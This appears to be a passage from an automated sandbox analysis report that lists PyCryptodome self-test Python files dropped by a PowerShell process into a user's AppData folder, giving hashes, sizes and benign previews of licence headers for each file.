                                                                                                                                                                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                  File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):854
                                                                                                                                                                                                  Entropy (8bit):4.891350639959851
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:24:1REqJBQCf+sAJOIE5P0fid1o4zOZKXiojo/f:lQW+sd5CidO4ifao/f
                                                                                                                                                                                                  MD5:0B01F3499238530A9A99E48F305DB9AC
                                                                                                                                                                                                  SHA1:7AE9ADEAF96CF6B47C721A124AA568AB1A0B605C
                                                                                                                                                                                                  SHA-256:043AEDA2F263A42A0086FCBB0CA801FF1D9BF396FFCC966452FF25DD5030A013
                                                                                                                                                                                                  SHA-512:4CDCFA0E53EBE9F65207817A79419F6C60E6F0BB51EF4ECDB89736244058A690410F767EC8AAAC2C2B10BDB38361E0F60FCD3DF3580639935A423A0E6E068517
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Preview:from typing import Callable, Tuple, Union, Sequence, Any, Optional, TypeVar....__all__ = ['StrongRandom', 'getrandbits', 'randrange', 'randint', 'choice', 'shuffle', 'sample']....T = TypeVar('T')....class StrongRandom(object):.. def __init__(self, rng: Optional[Any]=None, randfunc: Optional[Callable]=None) -> None: ... # TODO What is rng?.. def getrandbits(self, k: int) -> int: ..... def randrange(self, start: int, stop: int = ..., step: int = ...) -> int: ..... def randint(self, a: int, b: int) -> int: ..... def choice(self, seq: Sequence[T]) -> T: ..... def shuffle(self, x: Sequence) -> None: ..... def sample(self, population: Sequence, k: int) -> list: ......._r = StrongRandom()..getrandbits = _r.getrandbits..randrange = _r.randrange..randint = _r.randint..choice = _r.choice..shuffle = _r.shuffle..sample = _r.sample..

                                                                                                                                                                                                  C:\Users\user\AppData\Local\ChromeApplication\Lib\site-packages\Crypto\SelfTest\Cipher\__init__.py

                                                                                                                                                                                                  Download File
                                                                                                                                                                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                  File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):3680
                                                                                                                                                                                                  Entropy (8bit):5.085786985818767
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:48:NCwEIB0jcQHMsvI/S3oCF2D0BVjtxxtDP5H8k/38KlKKFpBnFRNxtZFRtf/hzdrB:UwfFQHvo58zGk/sEjd/1drB
                                                                                                                                                                                                  MD5:CF0E3F50FEEC49E1E243B3576BC34E7A
                                                                                                                                                                                                  SHA1:D9AD4301C9F023D2067384BB241859B032B6C92B
                                                                                                                                                                                                  SHA-256:EC3B0CB878618BF4A7ADCF497146F4CA3F203B448EA510ABE8B72C9A55568347
                                                                                                                                                                                                  SHA-512:A4C3C13B23ECD0B8E20726C92741BE318CDD5DC39BD4125246EF06227F1DD2534B378F88B305AB6AC51A7ECABA88A4E80B9956BC9B234666F316516E5EE513F7
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Preview:# -*- coding: utf-8 -*-..#..# SelfTest/Cipher/__init__.py: Self-test for cipher modules..#..# Written in 2008 by Dwayne C. Litzenberger <dlitz@dlitz.net>..#..# ===================================================================..# The contents of this file are dedicated to the public domain. To..# the extent that dedication to the public domain is not available,..# everyone is granted a worldwide, perpetual, royalty-free,..# non-exclusive license to exercise all rights associated with the..# contents of this file for any purpose whatsoever...# No rights are reserved...#..# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND,..# EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF..# MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND..# NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS..# BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN AN..# ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN..# CONNECTION WIT

                                                                                                                                                                                                  C:\Users\user\AppData\Local\ChromeApplication\Lib\site-packages\Crypto\SelfTest\Cipher\common.py

                                                                                                                                                                                                  Download File
                                                                                                                                                                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                  File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):17826
                                                                                                                                                                                                  Entropy (8bit):4.6460648083415315
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:192:ywdQHvJyFTEaHPRZn46TEiQTEgt4QY2zE/xHN8XZBU:yUeJgpTQY2zE/t6XZC
                                                                                                                                                                                                  MD5:8D17B3809421F8A3272394DE1E9F13E0
                                                                                                                                                                                                  SHA1:3B0A85C4645452F4D5397720A19139A0A0520A19
                                                                                                                                                                                                  SHA-256:4BE599673037E90D439F42B30E06F975F906E92135820B3B14808FEE7BF44339
                                                                                                                                                                                                  SHA-512:F08B0F988B52906991668DC6B5236B4D47F9074BEBB2BE164D37D01E964CB8F14A2CE7BAC3D035651347A53AC6D9497E733B422D04E79924316A31158129418A
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Preview:# -*- coding: utf-8 -*-..#..# SelfTest/Hash/common.py: Common code for Crypto.SelfTest.Hash..#..# Written in 2008 by Dwayne C. Litzenberger <dlitz@dlitz.net>..#..# ===================================================================..# The contents of this file are dedicated to the public domain. To..# the extent that dedication to the public domain is not available,..# everyone is granted a worldwide, perpetual, royalty-free,..# non-exclusive license to exercise all rights associated with the..# contents of this file for any purpose whatsoever...# No rights are reserved...#..# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND,..# EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF..# MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND..# NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS..# BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN AN..# ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN..# CONNECTION

                                                                                                                                                                                                  C:\Users\user\AppData\Local\ChromeApplication\Lib\site-packages\Crypto\SelfTest\Cipher\test_AES.py

                                                                                                                                                                                                  Download File
                                                                                                                                                                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                  File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):73082
                                                                                                                                                                                                  Entropy (8bit):4.7352476642791395
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:1536:YH+534+If+1xcBWF2bwMnjrpCPLJCDXGsFKhKO5YQwa:YWykMMJwXZqWQ5
                                                                                                                                                                                                  MD5:D5746D4A7B92D02CD239C5141A758A90
                                                                                                                                                                                                  SHA1:F4898202BCB85AA3A95BF963C258DA625C140868
                                                                                                                                                                                                  SHA-256:C63E2F372BCC41EC2C4667A8C8036378D920F96E66EA6E74F1061AE18FC2C181
                                                                                                                                                                                                  SHA-512:C07BEE7D084F6934DB1814C8B69124ECF4FE72933FF5960A880C719E58628244D9554103110ECE7F56DBEA410A0FB751EFC848A5DB36CB8537E9B2ED54976B8A
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Preview:# -*- coding: utf-8 -*-..#..# SelfTest/Cipher/AES.py: Self-test for the AES cipher..#..# Written in 2008 by Dwayne C. Litzenberger <dlitz@dlitz.net>..#..# ===================================================================..# The contents of this file are dedicated to the public domain. To..# the extent that dedication to the public domain is not available,..# everyone is granted a worldwide, perpetual, royalty-free,..# non-exclusive license to exercise all rights associated with the..# contents of this file for any purpose whatsoever...# No rights are reserved...#..# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND,..# EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF..# MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND..# NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS..# BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN AN..# ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN..# CONNECTION WITH THE

                                                                                                                                                                                                  C:\Users\user\AppData\Local\ChromeApplication\Lib\site-packages\Crypto\SelfTest\Cipher\test_ARC2.py

                                                                                                                                                                                                  Download File
                                                                                                                                                                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                  File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):6621
                                                                                                                                                                                                  Entropy (8bit):5.305716519169683
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:96:YwfFQHvoYHgW7KtQBTUtRUfOuCPjW+GIOEN7RataZu/VCunMirB:YwdQHvRQgVQUM4rB
                                                                                                                                                                                                  MD5:B87A188050AF2A09D7F1D295134E9194
                                                                                                                                                                                                  SHA1:7F6A2BE8054831EF69A90CC7C94D3807DC93C3B0
                                                                                                                                                                                                  SHA-256:82C1FE3F3E2A2056EEFE5C7A2FF0DB52A8BA12012411BA8692636044B5D47D14
                                                                                                                                                                                                  SHA-512:B215E0107A44D86ABFA9103F06FED3CC6E44F6090AF0E47A62094EDF21F17090112A168397D201E967787D2EDCBB4F07236D980746DC208DB33AB06000E5DC0F
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Preview:# -*- coding: utf-8 -*-..#..# SelfTest/Cipher/ARC2.py: Self-test for the Alleged-RC2 cipher..#..# Written in 2008 by Dwayne C. Litzenberger <dlitz@dlitz.net>..#..# ===================================================================..# The contents of this file are dedicated to the public domain. To..# the extent that dedication to the public domain is not available,..# everyone is granted a worldwide, perpetual, royalty-free,..# non-exclusive license to exercise all rights associated with the..# contents of this file for any purpose whatsoever...# No rights are reserved...#..# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND,..# EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF..# MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND..# NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS..# BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN AN..# ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN..# CONNECTION

                                                                                                                                                                                                  C:\Users\user\AppData\Local\ChromeApplication\Lib\site-packages\Crypto\SelfTest\Cipher\test_ARC4.py

                                                                                                                                                                                                  Download File
                                                                                                                                                                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                  File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):25450
                                                                                                                                                                                                  Entropy (8bit):4.102295070491694
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:384:YUe0La2IgMfLrDDtIoOJrL+cWuuO221c4Q9FTSScnHNqh0ndYnB0pL++:YH0La2AfOoOt+zdO5PSFNANqiaq
                                                                                                                                                                                                  MD5:A628F3159DB22911E3886971DF0D9116
                                                                                                                                                                                                  SHA1:01D491D6C9867B3B8C2D4966B108864EB0FC6EF0
                                                                                                                                                                                                  SHA-256:4B5535377C5F07E7A2BEB41443BEAE9E340C3F0E0C2CCE7770BBA489CFF57E20
                                                                                                                                                                                                  SHA-512:5B2F8A7E1ACC453656251E0FADB2762AD65FEB141EA9A162C345F25F0AB873E5B7B742E149BA086F7B8449B169C91D7EA3BDCE49434B65BCFE881A068A8C66C3
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Preview:# -*- coding: utf-8 -*-..#..# SelfTest/Cipher/ARC4.py: Self-test for the Alleged-RC4 cipher..#..# Written in 2008 by Dwayne C. Litzenberger <dlitz@dlitz.net>..#..# ===================================================================..# The contents of this file are dedicated to the public domain. To..# the extent that dedication to the public domain is not available,..# everyone is granted a worldwide, perpetual, royalty-free,..# non-exclusive license to exercise all rights associated with the..# contents of this file for any purpose whatsoever...# No rights are reserved...#..# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND,..# EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF..# MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND..# NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS..# BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN AN..# ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN..# CONNECTION

                                                                                                                                                                                                  C:\Users\user\AppData\Local\ChromeApplication\Lib\site-packages\Crypto\SelfTest\Cipher\test_Blowfish.py

                                                                                                                                                                                                  Download File
                                                                                                                                                                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                  File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):7390
                                                                                                                                                                                                  Entropy (8bit):5.2680859039459165
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:192:/wdQHvMFFlIpgA3KM0vOGTga/djVApGRXN/MOh:/UeMFFl6gMKM0Z
                                                                                                                                                                                                  MD5:8B80D84AFCCD46C28B9EAF5C6AD7442F
                                                                                                                                                                                                  SHA1:ADE78A3D2095C7FDE77D6CEB5F4DFB3BA39AD9AE
                                                                                                                                                                                                  SHA-256:91F26B656B58BA5C73C57DA0AE5B48F5A911D82DB12738B59AE5C8B82F96270C
                                                                                                                                                                                                  SHA-512:88261BDD58287685C66982D85673A9E8264B88B4863E74A7601B462D35EBB6229D6282F996045209F0FC57FCF2BDB77403BA30117D994E16F61681224EA6D311
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Preview:# -*- coding: utf-8 -*-..#..# SelfTest/Cipher/test_Blowfish.py: Self-test for the Blowfish cipher..#..# Written in 2008 by Dwayne C. Litzenberger <dlitz@dlitz.net>..#..# ===================================================================..# The contents of this file are dedicated to the public domain. To..# the extent that dedication to the public domain is not available,..# everyone is granted a worldwide, perpetual, royalty-free,..# non-exclusive license to exercise all rights associated with the..# contents of this file for any purpose whatsoever...# No rights are reserved...#..# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND,..# EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF..# MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND..# NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS..# BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN AN..# ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN..# CONN

                                                                                                                                                                                                  C:\Users\user\AppData\Local\ChromeApplication\Lib\site-packages\Crypto\SelfTest\Cipher\test_CAST.py

                                                                                                                                                                                                  Download File
                                                                                                                                                                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                  File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):3380
                                                                                                                                                                                                  Entropy (8bit):5.2648285141796896
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:48:NbwEIB0jcQHMsvI/S3oCFlE+Qs+tx8NIZNgtNpMaZC3eZ+kCun8Dsrajy:JwfFQHvoBHscOYit7ku1CunMsrp
                                                                                                                                                                                                  MD5:42CD9C86B6A76226293A43A9310F0310
                                                                                                                                                                                                  SHA1:FD751A06B182925F0F45813E3BCDE1F26D0D2078
                                                                                                                                                                                                  SHA-256:98A16555489559E0B93F6338A7CA46516232DF195093859CFAF3EFB05B9AB7FA
                                                                                                                                                                                                  SHA-512:0D029235022EBEEE6131986449A84ABD1F64A31B04A51C73F6A1AE42CC0F60B7F4189BFEB7BE843339A8C3082BD578A8B110C7DCDB78C34B74E2512F5E0CE36D
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Preview:# -*- coding: utf-8 -*-..#..# SelfTest/Cipher/CAST.py: Self-test for the CAST-128 (CAST5) cipher..#..# Written in 2008 by Dwayne C. Litzenberger <dlitz@dlitz.net>..#..# ===================================================================..# The contents of this file are dedicated to the public domain. To..# the extent that dedication to the public domain is not available,..# everyone is granted a worldwide, perpetual, royalty-free,..# non-exclusive license to exercise all rights associated with the..# contents of this file for any purpose whatsoever...# No rights are reserved...#..# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND,..# EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF..# MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND..# NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS..# BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN AN..# ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN..# CONNE

                                                                                                                                                                                                  C:\Users\user\AppData\Local\ChromeApplication\Lib\site-packages\Crypto\SelfTest\Cipher\test_CBC.py

                                                                                                                                                                                                  Download File
                                                                                                                                                                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                  File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):20758
                                                                                                                                                                                                  Entropy (8bit):4.976686485008944
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:384:0rskrs9VqFUiiIzqO9/WgGD4GxZxYe4EO+cCFtKCA9uCnjuGDXx+:0r6qh9Q4EdcCFtKCAcCaGDB+
                                                                                                                                                                                                  MD5:120D405F44D54B6CFAFFAFB1AEAC7A16
                                                                                                                                                                                                  SHA1:56AB7734215AD736C4D1026CE236069AEC97FAD7
                                                                                                                                                                                                  SHA-256:C2D96EA70E4CA1A31C148E7E1A3A44F696596DF00992D51A4868D96465B2E332
                                                                                                                                                                                                  SHA-512:421C0CA1FEC6CDED7CE2E1D7BA7C71A0192DDCB274E6C683F0E6236C2F6ACB2B85A01D687C919A8C95C053EDE5FB308F113D3D7BB45063D1EBF6B78D8032160A
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Preview:# ===================================================================..#..# Copyright (c) 2014, Legrandin <helderijs@gmail.com>..# All rights reserved...#..# Redistribution and use in source and binary forms, with or without..# modification, are permitted provided that the following conditions..# are met:..#..# 1. Redistributions of source code must retain the above copyright..# notice, this list of conditions and the following disclaimer...# 2. Redistributions in binary form must reproduce the above copyright..# notice, this list of conditions and the following disclaimer in..# the documentation and/or other materials provided with the..# distribution...#..# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS..# "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT..# LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS..# FOR A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE..# COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE FO

                                                                                                                                                                                                  C:\Users\user\AppData\Local\ChromeApplication\Lib\site-packages\Crypto\SelfTest\Cipher\test_CCM.py

                                                                                                                                                                                                  Download File
                                                                                                                                                                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                  File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):38240
                                                                                                                                                                                                  Entropy (8bit):4.91982351735035
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:384:Hrskrs9Vq732a4qBfxjXTqXPqzvGfp589zJ2FmOsI2vJfd+OjYyp9ynb1cd7l+6J:Hr6qN4ANgLmxWJ/F01aDXqx
                                                                                                                                                                                                  MD5:A685CF6BD22AB69D370F92B81D9C0E59
                                                                                                                                                                                                  SHA1:7EA6F54B4469B4B033D82BB5BFFC5659D967AA15
                                                                                                                                                                                                  SHA-256:A8351FB17A8A7B405D4FF76C2B596848FF5239A3E4D5E7F699240A4C96D71462
                                                                                                                                                                                                  SHA-512:2DA781592EA409DDBB7C15F14E29F09F58B1A304609E0F0061D086ADBB8AEB683E87E9200F7DB6B036B2ED86175FC61DED04FD2BB060541D65EE1A1752F573E6
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Preview:# ===================================================================..#..# Copyright (c) 2015, Legrandin <helderijs@gmail.com>..# All rights reserved...#..# Redistribution and use in source and binary forms, with or without..# modification, are permitted provided that the following conditions..# are met:..#..# 1. Redistributions of source code must retain the above copyright..# notice, this list of conditions and the following disclaimer...# 2. Redistributions in binary form must reproduce the above copyright..# notice, this list of conditions and the following disclaimer in..# the documentation and/or other materials provided with the..# distribution...#..# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS..# "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT..# LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS..# FOR A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE..# COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE FO

                                                                                                                                                                                                  C:\Users\user\AppData\Local\ChromeApplication\Lib\site-packages\Crypto\SelfTest\Cipher\test_CFB.py

                                                                                                                                                                                                  Download File
                                                                                                                                                                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                  File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):16472
                                                                                                                                                                                                  Entropy (8bit):4.9687403467675555
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:192:9qrskrs9t3q/IFOD7nMCWaL0CH1k9SC/D6PV3TRrFVBvGGHSrAOp:0rskrs9VqzvMCFL0CVk9SC/DKFVG
                                                                                                                                                                                                  MD5:01F0F6D83AB2952197EAEB8F0F83A00D
                                                                                                                                                                                                  SHA1:43D59454591AEB6F9DA2B8DC92E2B9BF5C4B8544
                                                                                                                                                                                                  SHA-256:9EA26EEBF360B5271B9A4FFB3A961CB19114903906D37FB1DEF604E25BF433EB
                                                                                                                                                                                                  SHA-512:0F4807944F16CD43FD0DD1EA59AD9A0B4467A0843C6FB844E50D8314C5DF5BBDF4448646479397686660062A82B632097CB2B7DFC429B3B302D140B537F04A2F
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Preview:# ===================================================================..#..# Copyright (c) 2014, Legrandin <helderijs@gmail.com>..# All rights reserved...#..# Redistribution and use in source and binary forms, with or without..# modification, are permitted provided that the following conditions..# are met:..#..# 1. Redistributions of source code must retain the above copyright..# notice, this list of conditions and the following disclaimer...# 2. Redistributions in binary form must reproduce the above copyright..# notice, this list of conditions and the following disclaimer in..# the documentation and/or other materials provided with the..# distribution...#..# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS..# "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT..# LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS..# FOR A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE..# COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE FO

                                                                                                                                                                                                  C:\Users\user\AppData\Local\ChromeApplication\Lib\site-packages\Crypto\SelfTest\Cipher\test_CTR.py

                                                                                                                                                                                                  Download File
                                                                                                                                                                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                  File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):21786
                                                                                                                                                                                                  Entropy (8bit):5.096707176497335
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:192:4qrskrs9t3q/I5KdTQUBgQXKIQ4NBtkP5QoIAfi+1+PVcC7+bKGw5EBaBg/y/xNe:Hrskrs9VqKZYPV0Nakoe8QjNV1cYtsu
                                                                                                                                                                                                  MD5:AE67CABCE5676ADF76D54C20328CA40E
                                                                                                                                                                                                  SHA1:6009537CE1C06784B2304C11D37BA964F54BB258
                                                                                                                                                                                                  SHA-256:4A24DAB89ED26A137BB8ED94B121623FDFE98B1E1582A1B259D8F8A4C9FEBFFE
                                                                                                                                                                                                  SHA-512:FE9C0CA688E90F6A6A88C10E72B07D7486D86B2F2D80DFF3D74098D6EEE7460810BD3E4737C1B7D68E9FBA621989D3ECE742E792C2EC8D8FD17831E7CA918CA9
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Preview:# ===================================================================..#..# Copyright (c) 2015, Legrandin <helderijs@gmail.com>..# All rights reserved...#..# Redistribution and use in source and binary forms, with or without..# modification, are permitted provided that the following conditions..# are met:..#..# 1. Redistributions of source code must retain the above copyright..# notice, this list of conditions and the following disclaimer...# 2. Redistributions in binary form must reproduce the above copyright..# notice, this list of conditions and the following disclaimer in..# the documentation and/or other materials provided with the..# distribution...#..# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS..# "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT..# LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS..# FOR A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE..# COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE FO

                                                                                                                                                                                                  C:\Users\user\AppData\Local\ChromeApplication\Lib\site-packages\Crypto\SelfTest\Cipher\test_ChaCha20.py

                                                                                                                                                                                                  Download File
                                                                                                                                                                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                  File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):20845
                                                                                                                                                                                                  Entropy (8bit):4.919874389291741
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:384:0rskrs9Vqse4VTbVH31w6YKxYWQChRrYChgz9u:0r6qseObVH31hYyZgxu
                                                                                                                                                                                                  MD5:6C26707E9C0059E6B221CB64D91AC717
                                                                                                                                                                                                  SHA1:8DD876F7CF6D438EF7E6F9B1117CA0F8644E7B73
                                                                                                                                                                                                  SHA-256:15EC0CCBE86A0910D0416230FAC536FC59AE0A86ED59D866E6C584AE1306E23E
                                                                                                                                                                                                  SHA-512:8C261E8630939AE97648D93562D97FDF19B098DA22C599B96918882D38809AFF208658E7D39104C353DF521E2CA2DC9126674EF1B1901C35E19F4EE50A197915
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Preview:# ===================================================================..#..# Copyright (c) 2014, Legrandin <helderijs@gmail.com>..# All rights reserved...#..# Redistribution and use in source and binary forms, with or without..# modification, are permitted provided that the following conditions..# are met:..#..# 1. Redistributions of source code must retain the above copyright..# notice, this list of conditions and the following disclaimer...# 2. Redistributions in binary form must reproduce the above copyright..# notice, this list of conditions and the following disclaimer in..# the documentation and/or other materials provided with the..# distribution...#..# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS..# "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT..# LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS..# FOR A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE..# COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE FO

                                                                                                                                                                                                  C:\Users\user\AppData\Local\ChromeApplication\Lib\site-packages\Crypto\SelfTest\Cipher\test_ChaCha20_Poly1305.py

                                                                                                                                                                                                  Download File
                                                                                                                                                                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                  File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):31490
                                                                                                                                                                                                  Entropy (8bit):4.760962660094756
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:384:zrskrs9Vq54KdH+zQlFTMzJjecMLn6rrMPCrFC2Ogx9m2gJ444BP6xDIG76pYWsh:zr6qPHL6PMlPHYahKS2yGeVqZo
                                                                                                                                                                                                  MD5:75D6666A336FBAA99E486B14AEF6D176
                                                                                                                                                                                                  SHA1:3B11356C0D13F488C2D5F7A274D90CB27E7D3DD7
                                                                                                                                                                                                  SHA-256:15F3B00A1BC049C62C9E26EF3A06D91FDD800028BD4CBE2A82FA521EFCAB336E
